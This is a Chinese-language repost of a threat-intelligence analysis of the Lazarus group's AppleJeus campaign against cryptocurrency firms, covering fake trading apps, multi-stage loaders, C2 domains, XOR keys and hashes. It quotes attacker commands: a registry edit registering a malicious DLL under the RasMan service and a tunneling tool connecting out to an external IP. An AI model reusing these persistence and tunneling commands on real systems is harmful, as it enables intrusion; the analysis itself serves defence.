怎样进行AppleJeus行动分析

Lazarus组织是目前最活跃的APT组织之一。 2018年,卡巴斯基针发现由该组织发起的名为AppleJeus的攻击行动。该行动是Lazarus首次针对macOS用户的攻击,为了攻击macOS用户,Lazarus开发了macOS恶意软件并添加身份验证机制,其可以非常仔细谨慎的下载后一阶段的有效负载,并在不落盘的情况下加载下一阶段的有效负载。为了攻击Windows用户,他们制定了多阶段感染程序。在“ AppleJeus”行动分析发布后,Lazarus在进行攻击时变得更加谨慎,采用了更多多方法来避免被发现。

AppleJeus后续

发布AppleJeus行动分析后,Lazarus继续使用类似的作案手法来破坏加密货币业务,研究人员发现了更多与AppleJeus中的macOS恶意软件类似的恶意软件。 该macOS恶意软件使用公共代码来开发安装程序。 恶意软件使用了Centrabit开发的QtBitcoinTrader。

怎样进行AppleJeus行动分析

这三个macOS安装程序使用相似的后安装程序脚本植入有效负载,并在执行获取的第二阶段有效负载时使用相同的命令。此外还识别出的另一类型macOS恶意软件MarkMakingBot.dmg(be37637d8f6c1fbe7f3ffc702afdfe1d),该恶意软件创建于2019-03-12,但网络通信并未加密,推测这是macOS恶意软件改造升级的中间阶段。

Windows恶意软件的变化

持续跟踪此活动中发现一名受害者在2019年3月受到Windows AppleJeus恶意软件的攻击。确定感染始于名为WFCUpdater.exe的恶意文件,攻击者使用了一个假网站:wfcwallet [.] com。

怎样进行AppleJeus行动分析

攻击者像以前一样使用了多阶段感染,但是方法发生了变化。 感染始于.NET恶意软件,其被伪装成WFC钱包更新程序(a9e960948fdac81579d3b752e49aceda)。此.NET文件执行后会检查命令行参数是否为“ / Embedding”。 该恶意软件负责使用硬编码的20字节XOR密钥(82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62)解密同一文件夹中的WFC.cfg文件。其后连接到C2服务器:

wfcwallet.com (resolved ip: 108.174.195.134)

www.chainfun365.com(resolved ip: 23.254.217.53)

之后会执行攻击者的命令,安装下一阶段的有效负载。 攻击者将两个文件放置到受害者系统文件夹中:rasext.dll和msctfp.dat。他们使用RasMan(远程访问连接管理器)Windows服务注册下一阶段有效负载。 经过基本侦察后,攻击者使用以下命令手动植入有效载荷:

cmd.exe /c dir rasext.dll

cmd.exe /c dir msctfp.dat

cmd.exe /c tasklist /svc | findstr RasMan

cmd.exe /c reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesRasManThirdParty /v DllName /d rasext.dll /f

为了建立远程隧道,攻击者使用命令行参数植入了更多的相关工具,但研究人员没有获得更多的工具文件。

Port opener:

%APPDATA%LenovodevicecenterDevice.exe 6378

Tunneling tool:

%APPDATA%LenovodevicecenterCenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443

macOS恶意软件变化

JMTTrading

在跟踪此攻击活动时发现了macOS恶意软件变体。攻击者将其假网站和应用程序称为JMTTrading,其他研究人员和安全厂商也发布了其大量技术细节。在这里强调一下这次攻击的不同之处。

攻击者使用GitHub来托管其恶意应用程序。

恶意软件作者在其macOS恶意软件中使用了Object-C而不是QT框架。

该恶意软件在macOS可执行文件中实现了简单的后门功能。

与以前的情况类似,使用16字节XOR密钥加密/解密的恶意软件。

Windows版本的恶意软件使用了ADVobfuscator来隐藏其代码。

macOS恶意软件的安装脚本与以前的版本有显着差异。

UnionCryptoTrader

还确定了另一项针对macOS的攻击。恶意程序名为UnionCryptoTrader,安全研究员 dineshdina04发现了一个相同的案例,该攻击总结如下:

安装脚本与JMTTrading使用的脚本相同。

恶意软件作者使用SWIFT开发了此macOS恶意软件。

恶意软件作者更改了从收集信息的方法。

该恶意软件开始使用auth_signature和auth_timestamp参数进行身份验证,以便传递第二阶段有效负载。

该恶意软件无需落盘即可加载下一阶段的有效负载。

Windows版本的UnionCryptoTrader

研究人员找到了Windows版本的UnionCryptoTrader(0f03ec3487578cef2398b5b732631fec)。它是从Telegram Messenger下载并执行:

C:Users[user name]DownloadsTelegram Desk较好UnionCryptoTraderSetup.exe

此外在假网站上找到了攻击者的Telegram,可以高度确认攻击者使用Telegram Messenger发送安装程序。由于有效负载仅在内存中执行,因此无法获取所有相关文件。 整个感染过程与WFCWallet非常相似,但是增加了注入过程。

怎样进行AppleJeus行动分析

Windows版本的UnionCryptoTrader具有以下窗口,显示几个加密货币的价格图表。

怎样进行AppleJeus行动分析

Windows版本的UnionCryptoTrader更新程序(629b9de3e4b84b4a0aa605a3e9471b31)与macOS版本功能相似。 根据构建路径(Z:Loaderx64ReleaseWinloaderExe.pdb),恶意软件作者将此恶意软件称为加载程序。 启动后,该恶意软件会检索受害者的基本信息,并以HTTP POST发送该信息。

怎样进行AppleJeus行动分析

如果C2服务器的响应为200,则恶意软件会解密有效负载并将其加载到内存中。最后恶意软件发送act=done。从此加载程序下载的下一阶段有效负载(e1953fa319cc11c2f003ad0542bca822)与WFCWallet的.NET下载程序相似。该恶意软件负责解密同一文件夹中的Adobe.icx文件,将下一个有效负载注入Internet Explorer进程,并执行攻击者的命令。

最终的有效载荷(dd03c6eb62c9bf9adaf831f1d7adcbab)与WFCWallet相同是通过手动植入的。恶意软件作者根据先前收集的信息植入仅在特定系统上有效的恶意软件。该恶意软件会检查受感染系统的信息,并将其与给定值进行比较。

怎样进行AppleJeus行动分析

Windows恶意软件将加密的msctfp.dat文件加载到系统文件夹中,并加载每个配置。 它根据该文件的内容执行附加命令。当恶意软件与C2服务器通信时会使用预定义标头的POST请求。

怎样进行AppleJeus行动分析

初始通信恶意软件首先发送参数:

cgu:来自配置的64bits十六进制值

aip:配置中的MD5哈希值

sv:硬编码值

如果来自C2服务器的响应为200,恶意软件会发送带有加密数据和随机值的下一个POST请求,攻击者使用随机值来识别每个受害者并验证POST请求。

imp:随机产生的值

dsh:imp的异或值

hb_tp:imp的异或值(key:0x67BF32)

hb_dl:加密的数据发送到C2服务器

ct:硬编码值

最后,恶意软件下载下一阶段的有效负载,对其进行解密。

此外在调查其基础架构时发现了几个仍在线的假冒网站。

怎样进行AppleJeus行动分析

怎样进行AppleJeus行动分析

总结

AppleJeus后续行动中找到几名受害者分布在英国,波兰,俄罗斯和中国,一些受害者与加密货币业务有关。

怎样进行AppleJeus行动分析

攻击者改变了macOS和Windows恶意软件,在macOS下载器中添加了身份验证机制并更改了macOS开发框架。 Windows系统中的感染过程与以前的不同。Lazarus组织为获取经济利益而进行攻击会一直持续。

怎样进行AppleJeus行动分析

关于“怎样进行AppleJeus行动分析”就介绍到这了,更多相关内容可以搜索亿速云以前的文章,希望能够帮助大家答疑解惑,请多多支持亿速云网站!

文章标题:怎样进行AppleJeus行动分析,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/26194

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云的头像亿速云认证作者
上一篇 2022年9月16日 下午10:38
下一篇 2022年9月16日 下午10:40

相关推荐

  • mysql有什么权限表

    mysql的权限表有:1、user表,用来记录允许连接到服务器的账号信息,该表里启用的所有权限都是全局级的,适用于所有数据库;2、db表,存储了用户对某个数据库的操作权限;3、tables_priv表,用来对单个表进行权限设置;4、columns_priv表,用来对单个数据列进行权限设置;5、pro…

    2022年9月19日
    56400
  • 怎样进行Apache的配置

    Apache的配置由httpd.conf文件配置,因此下面的配置指令都是在httpd.conf文件中修改。 主站点的配置(基本配置) (1) 基本配置: ServerRoot “/mnt/software/apache2” #你的apache软件安装的位置。其它指定的目录如果…

    2022年9月2日
    41000
  • mysql如何删除数据库

    删除方法:1、使用“win+r”键打开“运行”窗口,输入“cmd”,回车进入cmd命令窗口;2、在cmd窗口中,执行“mysql -u root -p”命令登录MySQL服务器;3、执行“DROP DATABASE IF EXISTS 数据库名;”命令来删除指定数据库中的所有表并永久删除该数据库,“…

    2022年9月26日
    1.2K00
  • Redis集群与扩展知识点分析

    Redis的高可用 1.为什么要高可用 防止单点故障,造成整个集群不可用 实现高可用通常的做法是将数据库复制多个副本以部署在不同的服务器上,其中一台挂了也可以继续提供服务 Redis实现高可用有三种部署模式:主从模式,哨兵模式,集群模式 2.主从模式 主节点负责读写操作 从节点只负责读操作 从节点的…

    2022年9月15日
    50900
  • 如何实现APT34泄密武器报告分析

    APT34是一个来自于伊朗的APT组织,自2014年起,持续对中东及亚洲等地区发起APT攻击,涉猎行业主要包含政府、金融、能源、电信等。多年来,攻击武器库不断升级,攻击手法也不断推陈出新,并且攻击行为不会因为被曝光而终止。 APT34组织背景 4月17日,有国外媒体报道,一个名为“Lab Dookh…

    2022年9月8日
    38300
  • program files可不可以删除

    “program files”不可以删除;“program files”文件夹是windows系统的程序文件夹,在系统安装完成后就已经生成,该文件夹用于存放已经安装的应用程序,位于C盘根目录,如果删除可能会导致系统运行的不稳定,导致操作系统的崩溃。 本教程操作环境:windows10系统、DELL …

    2022年9月10日
    92900
  • 小程序中如何实现excel数据批量导入

    1 建立数据源 要想将数据入库,就先需要建立数据源。登录微搭控制台,点击数据源,点击新建数据模型 输入名称和标识 数据源建立之后需要创建字段,点击添加字段 初学者最大的疑问是我需要建哪些字段,字段是个什么概念?我们还是先看一下我们的腾讯文档的在线表格 会用excel的人都知道,excel里有行和列的…

    2022年9月18日
    76500
  • vlookup函数匹配不出来只显示公式如何解决

    解决方法 名列前茅步,点击表格上方的“公式”按钮。 第二步,在下方菜单中找到并点击“显示公式”关闭它。 第三步,关闭完成,就可以发现我们的vlookup函数正常显示结果了。 关于“vlookup函数匹配不出来只显示公式如何解决”这篇文章的内容就介绍到这里,感谢各位的阅读!相信大家对“vlookup函…

    2022年9月24日
    1.8K00
  • translucenttb开机怎么启动

    translucenttb开机启动的方法: 1、首先我们同时按下键盘上的“Win+R”组合键,调出运行。 2、然后在运行框中输入“msconfig”再点击下方确定。 3、打开程序之后,进入“启动”选项卡,点击“打开任务管理器” 4、在任务管理器中,点击“启动”选项。 5、在任务管理器中,找到“Tra…

    2022年9月24日
    2.2K00
  • 怎么使用linux命令备份文件夹

    linux命令能备份文件夹。有两种命令用于备份文件夹:1、cp命令,该命令用于复制文件或文件夹,语法为“cp [options] source dest”;2、dump命令,该命令用于备份文件系统,语法为“dump [-cnu][-0123456789]…”。 linux命令备份文件夹 …

    2022年6月29日
    3.0K00
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部